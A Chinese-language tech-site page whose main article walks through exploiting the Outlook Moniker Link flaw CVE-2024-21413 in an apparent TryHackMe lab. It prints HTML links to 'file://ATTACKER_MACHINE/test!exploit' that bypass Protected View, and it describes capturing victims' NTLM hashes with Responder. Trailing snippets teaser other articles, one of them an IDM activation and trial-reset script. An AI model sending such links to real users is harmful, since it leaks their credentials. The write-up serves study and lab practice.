news 2026/6/20 8:10:12

微软Outlook Moniker-Link漏洞CVE-2024-21413技术分析与利用详解

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
微软Outlook Moniker-Link漏洞CVE-2024-21413技术分析与利用详解

Moniker-Link微软威胁分析:CVE-2024–21413

作者:#$ubh@nk@r
阅读时间:约3分钟
发布日期:2024年2月23日

简介:各位黑客朋友大家好!今天我将为大家介绍近期微软Outlook产品的一个漏洞。该漏洞于2024年2月13日公布。让我们深入了解其细节以及如何利用它。

此漏洞在处理一种特定类型的超链接(称为Moniker Link)时,能够绕过Outlook的安全机制。攻击者可以通过向受害者发送包含恶意Moniker Link的电子邮件来利用此漏洞,一旦用户点击该超链接,Outlook就会将用户的NTLMv2凭据发送给攻击者。

漏洞原理展示:

Outlook可以将电子邮件渲染为HTML。此外,Outlook能够解析诸如HTTP和HTTPS之类的超链接。然而,它也可以打开指向特定应用程序的URL,这些被称为Moniker Links。

通常,当触发外部应用程序时,Outlook会弹出安全警告。如果使用的是skypekeyword,那么警告会像这样显示。
这个弹窗是Outlook“受保护的视图”功能的结果。如果攻击者创建一个恶意超链接,同样会产生安全警报。

<p><ahref="file://ATTACKER_MACHINE/test">Click me</a></p>

但是,这个警报可以通过使用一个特殊字符来绕过 →!

<p><ahref="file://ATTACKER_MACHINE/test!exploit">Click me</a></p>

利用过程:

要利用此漏洞,我们需要创建一个邮件服务器。你可以在TryHackMe实验室中尝试。

CMNatic帮助我们创建了一个Python脚本,用于通过SMTPServer自动化地向受害者发送邮件。

GitHub - CMNatic/CVE-2024-21413: CVE-2024-21413 PoC for THM Lab
CVE-2024-21413 PoC for THM Lab. 在GitHub上创建账户以贡献CMNatic/CVE-2024-21413的开发。
github.com

现在运行脚本。
注意:请在第31行将Attacker_IP和MAILSERVER_IP修改为受害者的IP地址。
邮件已送达。

现在启动你的Responder来捕获NTLM哈希。

打开受害者的Outlook收件箱。你可以看到邮件已经送达。现在,如果你点击“Click me”,由于那个特殊字符!的存在,将不会弹出安全警报。否则,它会显示警报。

如果你点击了该链接,你将会获得受害者的NTLM哈希。

总结:

以上就是该漏洞的利用方式。

感谢阅读!

如果你喜欢这篇文章,别忘了点赞并关注我,以获取更多文章。

祝黑客之旅愉快~
CSD0tFqvECLokhw9aBeRqteIgvZsxhm14qXjGWMVhkLQKZqtp5udwihyDPFTm5IRv37dlo2W+4VY3z1d0M7aWubJiUxybkI3nx55gCmDWobsitrjS0yiQJF3ZKoUJ66E
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/6/16 20:26:33

XV3DGS-UEPlugin 高斯泼溅插件新手完全指南 [特殊字符]

XV3DGS-UEPlugin 高斯泼溅插件新手完全指南 &#x1f680; 【免费下载链接】XV3DGS-UEPlugin 项目地址: https://gitcode.com/gh_mirrors/xv/XV3DGS-UEPlugin 欢迎来到XV3DGS-UEPlugin的世界&#xff01;这是一款专为Unreal Engine 5设计的高斯泼溅模型插件&#xff0c…

作者头像 李华
网站建设 2026/6/16 12:40:05

FinBERT2金融NLP实战指南:10分钟从零掌握专业文本分析

FinBERT2金融NLP实战指南&#xff1a;10分钟从零掌握专业文本分析 【免费下载链接】FinBERT 项目地址: https://gitcode.com/gh_mirrors/finb/FinBERT 在金融科技快速发展的今天&#xff0c;如何让AI真正理解专业金融文本&#xff1f;传统通用NLP模型在处理财经新闻、研…

作者头像 李华
网站建设 2026/6/13 6:57:47

泰国地理JSON数据终极指南:从省份到子区县的全方位解决方案

泰国地理JSON数据终极指南&#xff1a;从省份到子区县的全方位解决方案 【免费下载链接】thailand-geography-json JSON files for Thailands geography data, including provinces, districts, subdistricts, and postal codes, adhering to best practices for optimal perfo…

作者头像 李华
网站建设 2026/6/15 20:07:19

IDM激活完全指南:实现永久使用的终极解决方案

IDM激活完全指南&#xff1a;实现永久使用的终极解决方案 【免费下载链接】IDM-Activation-Script IDM Activation & Trail Reset Script 项目地址: https://gitcode.com/gh_mirrors/id/IDM-Activation-Script 还在为IDM的30天试用限制而苦恼吗&#xff1f;每次试用…

作者头像 李华
网站建设 2026/6/14 20:42:46

macOS iSCSI Initiator 实战手册:三步打造企业级网络存储方案

macOS iSCSI Initiator 是一款专为苹果系统设计的开源存储扩展工具&#xff0c;能够将你的 Mac 电脑无缝连接到远程 iSCSI 存储设备&#xff0c;实现存储空间的无限扩展。无论你是需要处理大型媒体文件的创意工作者&#xff0c;还是寻求高效数据共享的企业用户&#xff0c;这款…

作者头像 李华